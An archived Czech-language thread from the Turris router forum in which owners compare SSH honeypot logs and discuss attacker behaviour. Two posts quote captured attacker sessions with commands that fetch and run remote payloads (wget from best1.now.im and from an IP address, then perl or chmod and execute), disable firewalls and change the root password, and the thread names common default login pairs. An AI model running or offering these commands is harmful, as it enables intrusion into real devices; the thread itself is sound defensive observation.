Forum Turris
Fórum Turris Nápověda

Milí majitelé routerů Turris,

toto fórum bylo 9. 12. 2016 zmrazeno a nahrazeno naším novým Turris fórem. Ještě chvíli bude dostupné k prohlížení, ale již zde není možné přispívat. Více informací naleznete v oznámení o uzavření fóra.


Dear Turris routers users,

this forum has been frozen on Dec 9th, 2016 and replaced by our new Turris forum. It will be read-only accessible for some time after. For more information, read the announcement about closing the forum.

Nahoru Téma Majitelé routerů / Technická podpora / SSH Honeypot - zdvojené pokusy...
- - Od commar (>>) Dne 2015-08-12 09:26
Při dnešní kontrole výpisu z Honeypotu mě napadlo:
nyní všichni útočníci (alespoň u mě) provedou dva pokusy, jednou admin/admin podruhé root/root.
Je žádoucí jim to takhle povolit?
Nemůže útočníka napadnout, že pokud oba projdou, jde o honeypot?
Nebylo by lepší jeden pokus blokovat?
Tohle mi připadá jen takové oťukávání, s následným uložením IP adres na další pokusy.
Pokud projdou oba pokusy, může to útočník rovnou odfiltrovat a dále nezkoušet.

Co vy na to? Díky...
Nadřazený - - Od Eskymák (>) Dne 2015-08-12 17:51
V systému mohou být aktivní oba účty zároveň, tak proč to nezkusit.

Zajímalo by mne, jestli už někdo zaznamenal i (následné) pokusy o něco jiného, než oťukávání pomocí echo.
Nadřazený - - Od Michal Dne 2015-08-12 18:01
jeden příklad

Jméno uživatele:

root

Heslo:

root

$ id Přijato 8. 8. 2015 14:57:00
$ cd /lib Přijato 8. 8. 2015 14:57:04
$ wget best1.now.im/1 Přijato 8. 8. 2015 14:57:08
$ perl 1 Přijato 8. 8. 2015 14:57:11
$ perl 1 Přijato 8. 8. 2015 14:57:12
$ perl 1 Přijato 8. 8. 2015 14:57:13
$ perl 1 Přijato 8. 8. 2015 14:57:13
$ perl 1 Přijato 8. 8. 2015 14:57:14
$ perl 1 Přijato 8. 8. 2015 14:57:14
$ passwd root Přijato 8. 8. 2015 15:00:43
$ Hello123 Zamítnuto 8. 8. 2015 15:00:46
$ Hello123 Zamítnuto 8. 8. 2015 15:00:49
$ cat /etc/passwd Přijato 8. 8. 2015 15:00:55
$ id Přijato 8. 8. 2015 15:01:15
$ nano 1 Zamítnuto 8. 8. 2015 15:01:22
$ apt-get install nano Přijato 8. 8. 2015 15:01:27
$ nano 1 Zamítnuto 8. 8. 2015 15:01:40
$ nano Zamítnuto 8. 8. 2015 15:01:46
$ reboot Přijato 8. 8. 2015 15:01:50
a není to jediný pokus
Nadřazený - - Od JFila (>>) Dne 2015-08-12 18:19
U nás třeba toto:

$ /etc/init.d/iptables stop  Zamítnuto  25. 7. 2015 11:44:00
$ service iptables stop  Zamítnuto  25. 7. 2015 11:44:00
$ SuSEfirewall2 stop  Zamítnuto  25. 7. 2015 11:44:00
$ reSuSEfirewall2 stop  Zamítnuto  25. 7. 2015 11:44:00
$ wget -c http://1.93.39.147:90/ngin  Přijato  25. 7. 2015 11:44:00
$ chmod 777 ngin  Přijato  25. 7. 2015 11:44:23
$ ./ngin  Zamítnuto  25. 7. 2015 11:44:23

nebo toto:

$ w  Přijato  23. 7. 2015 18:52:24
$ uptime  Přijato  23. 7. 2015 18:52:27
$ wget  Přijato  23. 7. 2015 18:52:32
$ apt-get  Přijato  23. 7. 2015 18:52:36
$ yum  Zamítnuto  23. 7. 2015 18:52:41
Nadřazený - - Od commar (>>) Dne 2015-08-12 21:08
Já mám v 90% ECHO...
Nadřazený - - Od fojtp Dne 2015-08-13 13:27
"echo -n test" ?
tim si taky testuji honeypot
Nadřazený - Od commar (>>) Dne 2015-08-13 13:37
Ano, proto to moje zamyšlení v prvním příspěvku...
Nadřazený - Od Eskymák (>) Dne 2015-08-13 16:29
Zajímavé, myslíte že tyto příkazy posílá už člověk nebo stále nějaký bot? Nezaznamenal někdo pokus o instalaci tohoto software? I když toto může být oťukání před instalací.

Většina těch klasických "echo" útoků je nejspíš od napadených routerů, na které funguje právě admin/admin a root/root případně ještě ubnt/ubnt.
Nahoru Téma Majitelé routerů / Technická podpora / SSH Honeypot - zdvojené pokusy...

Powered by mwForum 2.29.3 © 1999-2013 Markus Wichitill